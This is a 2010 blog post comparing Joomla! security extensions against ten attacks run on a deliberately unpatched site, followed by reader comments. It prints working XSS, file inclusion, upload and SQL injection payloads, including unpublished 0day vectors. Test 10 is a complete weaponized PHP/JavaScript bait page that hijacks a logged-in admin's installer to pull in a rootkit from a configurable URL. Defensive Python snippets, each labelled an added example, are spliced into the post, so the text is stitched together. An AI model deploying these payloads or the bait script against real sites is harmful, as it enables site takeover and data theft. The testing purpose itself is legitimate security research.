Monday, 20 December 2010 00:00

After having a couple different people ask me which Joomla! security extension I recommend, and having no real answer, I figured the best way was to simply try each one against various security risks and see which vectors are detected. This test should not be considered conclusive, and is not meant to endorse or defame any particular extension.

Tests

Many of the tests were devised from vulnerabilities that I have personally discovered, mostly due to me still having the old vulnerable versions lingering in my Downloads folder. Some are derived from other researchers' work, most notably YEHG (their double-nibble core reflective XSS became one of the tests). I even included a test with an undisclosed, unpatched vulnerability, in case any of the solutions were basing their scanning technique on known vulnerabilities or blacklists.

  1. Malicious User-Agent
  2. Persistent XSS
  3. Persistent XSS via BBCode
  4. Reflective XSS
  5. File Inclusion
  6. PHP File Upload
  7. SQL Injection
  8. SQL Injection via URI
  9. Cross-site Request Forgery
  10. Rootkit install via XSS/CSRF

Final Results

Environment

Since the purpose of this exercise is to test each extension, and not the site as a whole, I intentionally installed insecure extensions on an unpatched Joomla! 1.5.18 with all defaults left intact. It should be noted that alerts to upgrade or change the defaults from any security extensions involved were ignored for the purposes of this test, and unless changed by the extension the core .htaccess rules were used. PHP was configured with register globals off, magic quotes on, and no open_basedir, mod_security or anything of the sort.* Some extensions** were retested either after anomalous results or by request.

* SecureLive requires a "live" site, thus my at-home sandboxed virtualized test environment couldn't be used. A comparable live server was used instead, using similar configurations.

** Anti-Hacker was not configured properly during initial tests; Admin Tools Pro and SecureLive requested retesting.

Contenders

The following security extensions were chosen from both the JED and a few different Google searches, listed in alphabetical order:

  • Admin Tools Pro

    Admin Tools is a Joomla! extensions bundle which not only makes your site administration easier, but also strives to enhance your site's security. Among other things, Admin Tools can notify you of new Joomla! updates and install them, fix your files and directories permissions, perform database maintenance, handle custom URL redirection, create a secure .htaccess file and even includes an advanced Web Application Firewall to prevent most common attacks against your site.

  • Anti-Hacker

    Open Source Anti-Hacker Suite provides an all-in-one security protection for your websites, being able to secure your private data, protect your system files from malicious codes and attacks, and clean infected files.

  • Biziant Sentry

    The goal behind Biziant Sentry is to provide free, open-source technology to monitor the requests sent to your Joomla! site in order to detect malicious attempts to inject code. By matching request parameters to known valid types, Biziant Sentry can determine if a request is malicious and stop the attack immediately.

  • jFireWall

    jFireWall EndPoint Protection is a professional and powerful component with the active protection technology for detection of attacks by hackers, which guarantees reliable protection of your Joomla website.

  • jHackGuard

    jHackGuard is designed by SiteGround to protect Joomla websites from hacking attacks. Just add it to your Joomla and it will be safe against SQL Injections, Remote URL/File Inclusions, Remote Code Executions and XSS Based Attacks.

  • Mighty Defender

    MightyDefender is a powerful security component for Joomla 1.5 that allows you to protect your site from different attacks, such as PHP injections, SQL injections, Flood and sometimes even from spam.

  • NinjaSecurity

    NinjaSecurity is a system plugin that monitors what is called GPC data. Any incoming data is scanned for specially defined patterns, which you can modify as you want, and if it detects these patterns, then any attempts will be blocked and the hacker will then be banned after the attacking attempt.

  • RSFirewall!

    RSFirewall! is the most advanced Joomla! security service that you can use to protect your Joomla! website from intrusions and hacker attacks. RSFirewall! is backed up by a team of experts that are trained to be always up to date with the latest known vulnerabilities and security for Joomla! updates making RSFirewall! the best choice in keeping your website safe.

  • SecureLive

    SecureLive is an advanced security system designed to seamlessly integrate into a variety of platforms including: Joomla security, WordPress security, Drupal security, and E107 security. With a simple plugin installation and activation, you will immediately begin blocking hackers and seeing reports of the malicious activity on your site. SecureLive goes one step further and reports the hackers to the appropriate authorities.

Please Note: all extension descriptions taken from the vendors' respective web sites and/or their JED listing.


Test 1: Malicious User Agent

Embedding code in the User-Agent header is one notable tactic used together with file inclusion vulnerabilities: on Linux web servers the process environment is readable at /proc/self/environ, and it contains the request's HTTP_USER_AGENT, so including that file executes whatever PHP the attacker put in the header. This wasn't a test of any particular weakness, just a test to see what each solution would do if it encountered a User-Agent laced with code:

<?php echo phpinfo(); ?>'"<h1>

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: 403 Forbidden
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: failed to detect

Test 2: Persistent XSS via K2 v2.3

Okay, Test 1 is based on a hypothetical. Let's get into some "real" tests.

Test 2 is designed to test XSS filtering. Checking for < is the easy way to detect HTML markup, and matching on <script> tags is probably the most common way of detecting XSS, so I wanted something more creative than either.

For this test I turned to an XSS vector discovered in K2 version 2.3 that is based on partial tags: the payload contains no < at all, it simply closes the href attribute the value is written into and adds style and onmouseover attributes of its own. Using the "website" field of the K2 comment form (as an anonymous user):

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: logged XSS, did not prevent request from succeeding
  • jFireWall: failed to detect
  • jHackGuard: logged XSS, did not prevent request from succeeding
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: altered attack to prevent execution
  • SecureLive: failed to detect
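The lesson of Test 2 is worth making concrete. The snippet below is an added example (not code from the post, and Python rather than the PHP these extensions are written in): it drops the K2 payload into a quoted href attribute the way a vulnerable template would, shows that a check for < never fires, and shows that encoding for the attribute context is what actually stops it. The two render functions and the attribute parser are constructed for the illustration; only the payload text comes from the test above.

```python
import html
import re

# The Test 2 payload, constructed here from the post: the K2 "website" field
# ends up inside the href="" of a link, so the attacker closes the attribute
# and adds style/onmouseover attributes of his own. There is no '<' anywhere.
K2_PAYLOAD = (
    'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em"'
    ' onmouseover="location.href=String.fromCharCode(104,116,116,112)'
)


def naive_xss_check(value):
    """The check many filters amount to: is there any markup in the input?"""
    return "<" in value or "<script" in value.lower()


def render_link_vulnerable(url):
    """Hypothetical template: the stored value is echoed raw into an attribute."""
    return '<a href="%s">website</a>' % url


def render_link_safe(url):
    """Same template, but the value is encoded for a double-quoted attribute:
    every '"' becomes &quot; and can no longer terminate the attribute."""
    return '<a href="%s">website</a>' % html.escape(url, quote=True)


_ATTR = re.compile(r'\s([A-Za-z-]+)\s*=\s*"([^"]*)"')


def attributes_of(markup):
    """Crude attribute parse of the first tag: roughly what the browser sees."""
    tag = markup[: markup.index(">") + 1]
    return dict(_ATTR.findall(tag))


if __name__ == "__main__":
    print("naive check flags payload:", naive_xss_check(K2_PAYLOAD))
    print("vulnerable render attributes:", sorted(attributes_of(render_link_vulnerable(K2_PAYLOAD))))
    print("safe render attributes:", sorted(attributes_of(render_link_safe(K2_PAYLOAD))))
```

Run stand-alone, the vulnerable render yields href, style and onmouseover as three separate attributes, which is exactly the hoverjack the payload is after; the safe render yields a single (ugly but harmless) href. The takeaway for a filter author is that detection has to know the output context or it will keep missing attribute-breakout vectors; the takeaway for an extension author is that the encoding on output is the fix, not the filter.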

Test 3: Persistent XSS via BBCode

This test involves an unpatched, unpublished vulnerability in a popular extension that supports BBCode. I'll leave it as an exercise to the reader to discover which extension I used.*

[img]http://j.png?x'/oNeRrOr="/* [/img] eval( */ eval( String.fromCharCode( 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41 /*)*/ ) ) //">

* Those interested in more details can contact me privately.

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: refused to allow extension to function regardless of input
  • jFireWall: failed to detect
  • jHackGuard: logged XSS, did not prevent request from succeeding
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: altered attack to prevent execution
  • SecureLive: failed to detect

Test 4: Reflective XSS via Core

As disclosed by YEHG:

index.php?option=com_content&view=article&id=26&Itemid=40&%%32%32%%33%65%%33%63%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65%%36%31%%36%63%%36%35%%37%32%%37%34%%32%38%%32%66%%35%38%%35%33%%35%33%%32%66%%32%39%%33%63%%32%66%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65=%%32%32%%33%65%%33%63%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65%%36%31%%36%63%%36%35%%37%32%%37%34%%32%38%%32%66%%35%38%%35%33%%35%33%%32%66%%32%39%%33%63%%32%66%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: banned IP
  • jHackGuard: "Illegal key characters in global data" error page
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: banned IP

Test 5: File Inclusion

In February of this year, it was discovered that the "Hello World" component tutorial suffered from a Local File Include vulnerability. Furthermore, although the text of the tutorial was changed, the corresponding downloadable sources remained vulnerable for an additional 6 months.

The file inclusion used here is the one in AceVersions 1.0.1, where the view parameter ends up in an include path, so a traversal sequence with a trailing null byte reaches /etc/passwd:

?option=com_aceversions&view=../../../../../../../../../../../etc/passwd%00

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: 403 Forbidden
  • jFireWall: failed to detect
  • jHackGuard: 500 View Not Found, logged attack
  • Mighty Defender: blocked attack
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect
  • SecureLive: banned IP
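For the file inclusion case, the following is an added example of the check a component should do on a user-supplied view name before it goes anywhere near include(); it is not code from the post or from AceVersions, it is Python rather than PHP, and the view directory and allow-list are constructed for the illustration. It classifies the Test 5 request and a few variants of it.

```python
import posixpath
from urllib.parse import parse_qs

# Hypothetical layout of a component's view directory (constructed for this
# example; the real AceVersions paths are not shown in the post).
VIEW_DIR = "/var/www/html/components/com_example/views"
ALLOWED_VIEWS = ("category", "versions")


def classify_view(view, base=VIEW_DIR, allowed=ALLOWED_VIEWS):
    """Decide what to do with a user-supplied view name. Returns "ok" or the
    first failing check.

    A NUL byte is never legitimate in a file name (PHP before 5.3.4 silently
    truncated the path at it, which is what the %00 in the Test 5 request
    relies on); the resolved path must stay under the view directory, which
    catches '../' however it was encoded; and an allow-list of known view
    names is cheaper and stricter than either, and is the only check that
    also stops an absolute target such as /proc/self/environ.
    """
    if "\x00" in view:
        return "nul-byte"
    candidate = posixpath.normpath(posixpath.join(base, view, "view.html.php"))
    if posixpath.commonpath([base, candidate]) != base:
        return "traversal"
    if view not in allowed:
        return "unknown-view"
    return "ok"


def classify_query(query_string):
    """Pull 'view' out of a raw query string the way a front controller would.
    parse_qs URL-decodes, so %00 arrives here as a real NUL byte."""
    params = parse_qs(query_string, keep_blank_values=True)
    view = params.get("view", [""])[0]
    return classify_view(view)


if __name__ == "__main__":
    # The Test 5 request from the post, minus the option parameter's effect.
    print(classify_query("option=com_aceversions&view=../../../../../../../../../../../etc/passwd%00"))
    print(classify_view("../../../../etc/passwd"))
    print(classify_view("/proc/self/environ"))
    print(classify_view("category"))
```

The order matters less than having all three checks: a blacklist of ../ alone is what jHackGuard's "500 View Not Found" and the other pass/fail results here are effectively testing, and it says nothing about absolute paths, which is how the User-Agent trick from Test 1 gets its code executed.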

Test 6: PHP File Upload

Mosets Tree v2.1.5 and below allowed PHP code to be uploaded via the listings image field. The point behind this test is not to upload any particular PHP file (like a known shell, e.g., c99), but rather to test whether each solution detects the upload of PHP files at all.

Using this method and the following simple code as a payload:

<?php echo phpinfo(); ?><script>alert(1)</script>

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: blocked attack
  • NinjaSecurity: failed to detect
  • RSFirewall!: "ERROR: GD can only handle JPG, GIF and PNG files!"
  • SecureLive: failed to detect
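RSFirewall!'s "GD can only handle JPG, GIF and PNG files!" message points at the right idea: decide what an upload is from its bytes, not its name. The snippet below is an added example (not code from the post, from Mosets Tree or from RSFirewall!, and Python rather than PHP) of the pre-filter a file upload handler should apply; the filenames, the polyglot and the PNG stub are constructed for the illustration, and only the payload text comes from the test above.

```python
import re

# The Test 6 payload from the post.
TEST6_PAYLOAD = b"<?php echo phpinfo(); ?><script>alert(1)</script>"

# Signatures for the three formats GD accepts.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
ALLOWED = {"jpg": "jpg", "jpeg": "jpg", "gif": "gif", "png": "png"}
# Extensions a PHP-enabled Apache may execute; 'x.php.gif' is still handed to
# PHP under a mod_mime AddHandler configuration, so inner extensions count too.
DANGEROUS = {"php", "phtml", "php3", "php4", "php5", "phps"}
# PHP open tags, including the short echo tag; <script language="php"> was
# still honoured by PHP 5.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)|<script[^>]*language\s*=\s*[\"']?php", re.I)


def check_image_upload(filename, data):
    """Return (accepted, reason) for an uploaded 'image'.

    Checks, in order: the final extension is on the allow-list; no script
    extension hides earlier in the name; the first bytes carry that type's
    signature (the Test 6 payload fails here whatever it is called); and no
    PHP open tag appears anywhere in the body, which catches a GIF header
    followed by <?php, a file that passes the signature check.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED:
        return False, "extension not allowed"
    if DANGEROUS.intersection(parts[1:-1]):
        return False, "script extension hidden inside filename"
    kind = ALLOWED[parts[-1]]
    if not data.startswith(MAGIC[kind]):
        return False, "content does not start with a %s signature" % kind
    if PHP_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, "ok"


# Constructed inputs: a GIF header glued onto the payload, and a bare PNG header.
GIF_POLYGLOT = b"GIF89a\x01\x00\x01\x00" + TEST6_PAYLOAD
PNG_STUB = b"\x89PNG\r\n\x1a\n" + bytes(16)

if __name__ == "__main__":
    for name, blob in [("payload.php", TEST6_PAYLOAD), ("payload.gif", TEST6_PAYLOAD),
                       ("payload.php.gif", GIF_POLYGLOT), ("payload.gif", GIF_POLYGLOT),
                       ("photo.png", PNG_STUB)]:
        print(name, check_image_upload(name, blob))
```

This is a pre-filter, not the whole answer. Re-encoding the upload through GD (imagecreatefromstring followed by imagepng or imagejpeg) throws away everything except pixel data, and storing the result under a server-generated name outside the web root removes the question of what the web server would do with the original filename.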

Test 7: SQL Injection

This exercise is not intended to extract data (as it would be in real life), just to test whether the injection is allowed through.

Again AceVersions 1.0.1, this time a UNION SELECT injected through the catid parameter:

?option=com_aceversions&view=category&catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --

Results:

  • Admin Tools Pro: 403 Forbidden
  • Anti-Hacker: banned IP
  • Biziant Sentry: 403 Forbidden
  • jFireWall: banned IP
  • jHackGuard: logged request, altered request to prevent execution
  • Mighty Defender: failed to detect with the default rules; blocked once the injection rules were reconfigured
  • NinjaSecurity: logged request, blocked IP
  • RSFirewall!: failed to detect
  • SecureLive: failed to detect

Test 8: SQL Injection via URI

A number of 3rd party SEF extensions were recently found to be vulnerable to Blind SQL Injection via specially crafted URLs. These vulnerabilities are interesting because the payload travels in the URI path rather than in a query-string or POST parameter, so it never shows up in $_REQUEST, which is where most of these extensions look for it.

AceSEF 1.5.8 suffered from this injection:

http://target/1')and(if((select(username)from(jos_users)where(gid)like(25))like(0x61646d696e),benchmark(5000000,md5(1)),1)--'

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: allowed with core .htaccess, 404 Not Found using Sentry's .htaccess
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect
  • SecureLive: failed to detect

Test 9: CSRF

CSRF might very well be the hardest attack vector to protect against in cases where extensions do not use Joomla!'s core anti-CSRF tokens (or any other type of nonce). Using this example together with a form of spear phishing (you know, throwing laced links at admins and hoping for a "hit"), it's possible to write arbitrary PHP code to unpatched Mosets Tree installs.

This is one test that I didn't expect many solutions to properly detect - it can be difficult to differentiate between a truly authenticated request and one that is being spoofed in this manner.

Note: I'm giving Admin Tools Pro the benefit of the doubt here - in this particular case, these files could be loaded via other means by the extension itself (so direct access is not absolutely necessary).

Results:

  • Admin Tools Pro: failed to detect, prevents file from being accessed directly via .htaccess
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect, logs nonce warning
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect, notifies if the altered file is added to watch list
  • SecureLive: failed to detect
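Why no scanner could catch Test 9, and what the extension itself has to do instead, is easiest to see with the two requests side by side. The snippet below is an added example (not code from the post or from Mosets Tree, and Python rather than PHP) of a session-bound form token of the kind Joomla!'s core provides (JRequest::checkToken() on the server side in 1.5): the forged request arrives with the admin's own cookie and the same parameters, so the token is the only thing that tells it apart. The session store and form name are constructed for the illustration.

```python
import hmac
import hashlib
import secrets

# Server-side secret and a fake session store, constructed for this example.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"admin-session-1": {"user": "admin", "is_admin": True}}


def form_token(session_id, form_name, secret=SERVER_SECRET):
    """Derive a per-session, per-form token.

    The token is printed into the form as a hidden field. A page on the
    attacker's site can make the admin's browser submit the form, but it
    cannot read the admin's copy of the page to learn the token.
    """
    msg = ("%s\x00%s" % (session_id, form_name)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def handle_save(session_id, form):
    """Simulated admin action. Returns 'saved' or the rejection reason.

    Everything a WAF can see (cookie, URL, parameters) is identical for the
    legitimate and the forged request; only the token check differs.
    """
    session = SESSIONS.get(session_id)
    if not session or not session["is_admin"]:
        return "not authenticated"
    expected = form_token(session_id, "com_example.save")
    if not hmac.compare_digest(expected, form.get("token", "")):
        return "invalid token"
    # ...here the component would write its configuration file, which is the
    # step the Mosets Tree attack abuses to drop PHP on disk...
    return "saved"


if __name__ == "__main__":
    sid = "admin-session-1"
    genuine = {"setting": "value", "token": form_token(sid, "com_example.save")}
    forged = {"setting": "<?php /* attacker */ ?>"}          # no token to offer
    guessed = dict(forged, token="0" * 64)                   # or a made-up one
    print("genuine:", handle_save(sid, genuine))
    print("forged: ", handle_save(sid, forged))
    print("guessed:", handle_save(sid, guessed))
```

Two details carry the weight here: the comparison is constant-time (hmac.compare_digest), and the token is bound to the form name as well as the session, so a token lifted from one form cannot be replayed against another. The check belongs in every state-changing controller action, not just the ones an author expects to be attacked; the unprotected one is the one that gets used.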

Test 10: Malicious XSS to Install a Simple Rootkit

There are tons of extensions vulnerable to reflective XSS in the Administrator interface - the Joomla! Core was even vulnerable for quite a while. What follows is a method to gain Administrator access by duping an unsuspecting admin into opening a link while logged in.

Here's the bait code:

<?php
/**
 * system
 * (k) 2010
 * admin "search" xss bait code
 *
 * post a link to this script somewhere on the site
 * when this page is loaded the referrer is probed for vulnerable components
 * if one is found the attack is loaded into an iframe
 * when the page is loaded the iframe is shown across the whole browser window
 * if admin is logged in, visits your link & mouses over the page just once... win!
 * added bonus if admin has html5 capabilities (yay autofocus/onfocus)
 */
$redirect = 'http://google.com'; // where to go in x seconds
$timeout = 8000; // ms
$system_path = 'http://127.0.0.1/root/system.zip'; // path to com_system rootkit
$r = false; $r = 'http://127.0.0.1/sec2010/index.php'; // set to false to use referrer
$go = false; // if probing later is a success this will be true
$url = ''; // iframe url
if (false == $r) {
  $r = @$_SERVER['HTTP_REFERER']; // get referrer
}
if (!$r) die(); // no referrer
$r = parse_url($r); // parse url
if (!is_array($r)) die(); // not an array? must not have parsed correctly
$target = sprintf(
  "%s://%s%s",
  $r['scheme'],
  $r['host'],
  preg_replace(array('`\/?administrator`', '`index\.php`'), '', $r['path'])
);
// list of components/admin xss
$exploits = array(
  'joomgallery' => 'controller=categories&search=x', // 0day DAY 1
  'phocadownload' => 'view=phocadownloads&search=x', // 0day DAY 2
  'redirect' => 'view=links&filter_search=x', // 0day DAY 3
  'fabrik' => 'c=table&filter_table=x', // 0day DAY 4
  // patched
  'k2' => 'view=items&search=x', // fixed ?
  'community' => 'view=events&search=x', // jomsocial <= 1.8.8
  'comprofiler' => 'task=showField&search=x' // < 1.3.0
);
// event triggers
$triggers = array(
  // html5
  '%22%2fautofocus%2f%2f%2fonfocus%3D%22',
  // hoverjack
  '%22%2fstyle%3d%22position%3Aabsolute%3Btop%3A0px%3Bleft%3A0px%3Bwidth%3A999em%3Bheight%3A999em%3Bz-index%3A99999%22%2fonmouseover%3D%22'
);
// javascript code for installing rootkit
// most (all?) require js code to be in all lower case (damn)
$script = preg_replace(array('`\+`Di', '`\%0[9A]`'), array('%20', ''), urlencode(<<<EOF
(function(){eval('(function(){
  if(document.get\u0045lement\u0042y\u0049d(\'systemxss\'))return;
  var x=false,r=/administrator/,i=document.create\u0045lement(\'iframe\');
  if(r.test(location.href)){
    i.src=\'index.php?option=com_installer\';
    i.set\u0041ttribute(\'id\',\'systemxss\');
    i.set\u0053tyle(\'display\',\'none\');
    document.body.append\u0043hild(i);
    i.add\u0045vent(\'load\',function(e){
      if(x){return;}x=true;
      var d=e.target.content\u0044ocument;
      if(!d){return;}
      var inp=d.get\u0045lement\u0042y\u0049d(\'install_url\');
      inp.value=\'{$system_path}\';
      try{
        var b=inp.parent\u004eode.get\u0045lements\u0042y\u0054ag\u004eame(\'input\')[1];
        b.onclick();
      }
      catch(er){}
    });
  }
})();')})();
EOF
));
// if specific exploit is called, use it
// otherwise try to autodetect
$pattern = "%sadministrator/index.php?option=com_%s&%s%s";
$com = @$_REQUEST['com'];
$go = true;
if (isset($exploits[$com])) {
  $vector = $exploits[$com];
  $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
}
else {
  $go = false;
  // loop exploits
  foreach ($exploits as $com => $vector) {
    if (false !== @fopen("{$target}components/com_{$com}/{$com}.php", "r")) {
      $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
      $go = true;
      break;
    }
  }
}
if ('core' == @$_REQUEST['com'] || !$go) {
  // try to load up a known core search xss - yehg
  $com = 'admin';
  $vector = 'task=help&helpsearch=x';
  $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
}
?><html>
<head>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<style>
div{position:absolute;top:0px;left:0px;z-index:99999;display:none}
body,div{margin:0;padding:0;overflow:hidden}
body,div,iframe{width:100%;height:100%;border:0px}
</style>
</head>
<body>
<div><iframe src="<?php echo $url; ?>"></iframe></div>
<script type="text/javascript">
(function($){$(document).ready(function(){
  $('div').css({opacity:0.01}).css({display:'block'});
  setTimeout(function(){window.top.location.href="<?php echo $redirect; ?>";}, <?php echo $timeout; ?>);
});})(jQuery);
</script>
</body>
</html>

The file referenced above, "system.zip," is a simple Joomla! Component installer that installs a simple authentication plugin that allows an attacker to take further control of the site. Expect sources for this to pop up sometime in the near future.

Results:

  • Admin Tools Pro: install blocked when access to installer set to "nobody"
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: banned IP

Final Results

Extension            Test 1    Test 2    Test 3    Test 4    Test 5    Test 6    Test 7    Test 8    Test 9    Test 10   Total
Passes per test      2         2         3         4         5         2         7         1         1         3
Admin Tools Pro (1)  failed    failed    failed    failed    failed    failed    passed    failed    passed(2) passed(3) 3
Anti-Hacker          failed    passed    passed    failed    passed    failed    passed    failed    failed    failed    4
Biziant Sentry       passed    failed    failed    failed    passed    failed    passed    passed    failed    failed    4
jFireWall            failed    failed    failed    passed    failed    failed    passed    failed    failed    failed    2
jHackGuard           failed    failed    passed    passed    passed    failed    passed    failed    failed    failed    4
Mighty Defender      failed    failed    failed    failed    passed    passed    passed(4) failed    failed    failed    3
NinjaSecurity        failed    failed    failed    failed    failed    failed    passed    failed    failed    failed    1
RSFirewall!          passed    passed    passed    passed    failed    passed    failed    failed    failed    passed    6
SecureLive           failed    failed    failed    passed    passed    failed    failed    failed    failed    passed    3

Notes:

  1. Security tools are secondary in Admin Tools Pro - thus this solution fails tests that it was not designed to prevent in the first place (namely, XSS).
  2. Admin Tools Pro is getting the benefit of the doubt on this one.
  3. Admin Tools Pro must be configured to lock down com_installer to pass this test.
  4. Default SQL Injection rules did not block the attack; reconfigured rules prevent it.

Conclusion

I think it's readily apparent at this point that no extension passed this test 100%, though I didn't really help things by using known-insecure extensions and an out of date Joomla! install. That said, I figured it was important to note a few things:

  • RSFirewall! performed extremely well, though RSJoomla! was not at all interested in taking part in this exercise. I feel I must apologize for any affront caused by comments made by myself and others on Twitter. So RSJoomla!, if you're reading this - I'm sorry and I eat my words.
  • Jeff from SecureLive and Nicholas from Admin Tools Pro must be commended for their proactive stances to this test. Admin Tools Pro underwent some code changes, and Securelive added new rules to their scanning technology immediately after receiving the results.
  • Konstantin from Mighty Extensions was the only vendor to point out that none of the tests attempted to spread spam. He was the only vendor to suggest improvements to this test, and for that I not only thank him, but have ideas for next year's test!

Hopefully, this exercise has brought some attention to areas where each extension can improve in order for the Joomla! community to become safer than before. I'm planning on doing this again next year, so only time will tell...

Comments (15)
1 Monday, 20 December 2010 08:37
mandville
expect this to be a well linked post
2 Wednesday, 22 December 2010 06:45
nahrafqifahs
Nice!
3 Wednesday, 22 December 2010 18:56
betweenbrain
Thanks Jeff! This is really useful information. It will be very interesting to see how these Contenders test in three or six months from now. I hope they all get a 10 out of 10 then.
4 Thursday, 23 December 2010 10:52
Jeff Brown (SecureLive)
We have posted our official response to Mr. Channell's results. We disagree with some of the testing methods used and how the tests were performed. We ran similar tests using the proper methods to pass through the Joomla API and Full Server edition and received a 9 out of 10 score. (Which are typical of customer's reports.) We want to thank Mr. Channell for his time and effort and being part of the Security Team.

Read SecureLive's full official response here:
http://www.securelive.net/Typical-Cases/channell-response.html
5 Thursday, 23 December 2010 11:16
Jeff Channell
Jeff,

I hate to argue with your response, but I'll say the same thing publicly that I told you privately: SecureLive did NOT detect the failed tests either time I ran them. I understand you employ scanning on your remote server instead of each individual client, and if you have updated your signatures and scanning technology to detect these attacks, then these tests have served their purpose - but I find it quite dishonest of you to make the claims you have after knowingly failing some of these tests twice.

For example, you claim to have detected Test 2, while my test database for SecureLive clearly shows this was not the case for either the initial test OR the requested retest:

--
-- Dumping data for table `jos_k2_comments`
--

INSERT INTO `jos_k2_comments` (`id`, `itemID`, `userID`, `userName`, `commentDate`, `commentText`, `commentEmail`, `commentURL`, `published`) VALUES
(1, 45, 0, 'test', '2010-12-13 23:11:35', 'haxed haha tooooooooooo shooooooooooooort', 'hax@jeffchannell.com', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1),
(2, 44, 0, 'jeff', '2010-12-14 01:11:15', 'haha haxxed', 'eeevil@jeffchannell.com', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1);

Furthermore, there is no confusion as to how any solution "detects" attacks - if the above code sent me on my way to jeffchannell.com, IT FAILED. This has nothing to do with "did it send a 40* error or not," because that was not the point - if the script ran unaltered (as it did during the tests) it was marked as failure. In the example of Test 2, not only was the unaltered script saved to the database and thus executed, but SecureLive's detection system was absolutely silent - no notifications, no IP banning, nothing.
6 Wednesday, 29 December 2010 20:57
dpk
Thanks for doing this research. I hope it instigates more competition and interest in security related extensions and best practices for site owners. The lack of automated internal updates for most extensions and often any sensible, simple, new version release notices is a major drawback for the way it adds risk and maintenance costs to Joomla sites. On the jXtended Comments exploit, why hasn't this been openly addressed? I've seen scripted attacks on it since June.
7 Wednesday, 29 December 2010 21:11
Jeff Channell
dpk, I didn't use jXtended Comments in these tests... is it vulnerable to Test 3?
8 Wednesday, 09 February 2011 16:26
dpk
Not if I just drop your code in there as a non-logged in user. Then I get a 403. This is with CAPTCHA and reCAPTCHA off. If Moovur/Mollom is on, it says it thinks it might be spam and throws up a CAPTCHA screen.
9 Wednesday, 09 February 2011 16:29
dpk
One more thing--in actual use I've never seen jFirewall Lite do anything. It doesn't even log anything. jHackguard has only picked off some spam. Both seem to miss exploit attempts that show up in my logs. Early versions of NinjaSecurity seemed to flag almost any kind of input, and later versions don't catch anything.
10 Thursday, 24 March 2011 02:16
Tim24
Great post Jeff. Any idea how mod_security would have done on these tests? It seems kind of redundant to run one of these tools if mod_security is already running.
11 Saturday, 24 December 2011 13:46
BillA
Hey, I was wondering if this test is going to be repeated soon? I am on the fence between RSFirewall and OSE Security Suite.

Thanks.
12 Tuesday, 10 January 2012 13:01
Meredith
We currently lock down our client's Joomla websites at http://greenixhosting.com with a mix of RSFirewall (paid) Admin Tools (free) and GuardXT from OSE's security suite.

With this mix, in addition to our hardened servers, the client has just about all their bases covered.
13 Wednesday, 07 March 2012 20:38
Fabio Perri
Hi Mr. Jeff this "2010 Joomla! Security Extension Comparison" is the best article i ever read on this topic.

We would be grateful if you could make all new tests for the 2012.

From 2010 to 2012 well over two years have passed, and it would be interesting to know how the major "Joomla Security Extensions" would behave today.

Please Mr. Jeff realizes the "2012 Joomla! Security Extension Comparison"

I hope for your positive response, and I wish you a good day and good job, and very, very many thanks for this article.

Sincerely Fabio Perri.
14 Monday, 23 July 2012 00:11
nge nge
Hi Jeff,

